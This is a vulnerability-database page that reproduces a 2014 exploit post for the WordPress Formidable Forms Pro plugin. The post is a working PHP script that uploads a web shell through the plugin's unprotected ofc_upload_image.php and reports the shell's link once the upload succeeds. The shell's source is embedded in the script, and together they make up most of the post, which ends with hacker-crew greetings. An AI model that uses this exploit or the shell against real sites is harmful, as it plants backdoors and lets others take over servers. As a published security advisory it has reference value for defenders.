Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Formidable Forms Remote Code Execution

🗓️ 11 May 2014 00:00:00Reported by Manish TanwarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

WordPress Formidable Forms Remote Code Execution Vulnerability

Code
`##############################################################################################  
# Exploit Title : wordpress plugin "Formidable Forms" Remote code execution exploit  
# Exploit Author : Manish Kishan Tanwar  
# vendor Link : http://wordpress.org/plugins/formidable/  
# Version Affected: below verson 1.06.03(only pro version)  
# Discovered At : IndiShell LAB (indishell.in aka indian cyber army)  
# Love to : zero cool,Team indishell,Hardeep Singh  
##############################################################################################  
  
  
////////////////////////////////////  
POC Remote code Execution  
////////////////////////////////////  
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php file parameters ($_GET[ 'name' ] and $HTTP_RAW_POST_DATA)  
there is no security check on these parameters and can be exploited by attacker  
  
vulnerable link  
http://127.0.0.1/wordpress/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php  
  
shell will be here  
http://127.0.0.1/wordpress/wp-content/plugins/formidable/pro/js/tmp-upload-images/shell.php  
  
///////////////////////  
/// exploit code ////  
///////////////////////  
  
<!--exploit code by Team INDISHELL(Manish Tanwar)-->  
<?php  
  
$web="http://127.0.0.1";  
$shell="ica_shell.php";  
$file="wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php?name=";  
$up="/wp-content/plugins/formidable/pro/js/tmp-upload-images/";  
$upshell=$up.$shell;  
$data = '<?php  
echo "<body bgcolor=black>";  
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";   
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>";   
if( isset($_POST[\'sut\']) )  
{  
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']))  
{   
echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";   
}   
else {  
echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";   
}   
}   
?>';   
$link=$web;  
$target = trim($link.$file.$shell);  
$fshell=$link.$upshell;  
  
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',  
'Content-Type: text/plain');  
  
  
$handle = curl_init();  
curl_setopt($handle, CURLOPT_URL, $target);  
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);  
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);  
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);  
$source = curl_exec($handle);  
curl_close($handle);  
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($fshell, 'r'))  
{  
echo "shell has been uploaded :D here is shell link<br><a href= ".$fshell.">".$fshell."</a>";  
}  
else  
{  
echo "sorry :( ";  
}  
?>  
/////////////////////  
end of exploit code  
////////////////////  
  
  
--==[[ Greetz To ]]==--  
############################################################################################################################################  
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas   
Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,The creator,cyber warrior,Neo hacker ICA,Suriya Prakash  
cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen   
lovetherisk,brown suger and rest of TEAM INDISHELL  
############################################################################################################################################  
--==[[Love to]]==--  
# My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)  
--==[[ Special Fuck goes to ]]==--  
<3 suriya Cyber Tyson <3  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 May 2014 00:00Current
7.4High risk
Vulners AI Score7.4
wordpressformidable formsremote code executionvulnerabilityexploitmanish kishan tanwarpluginsecurityindishell labhttp_raw_post_dataphpcurlinjection.
46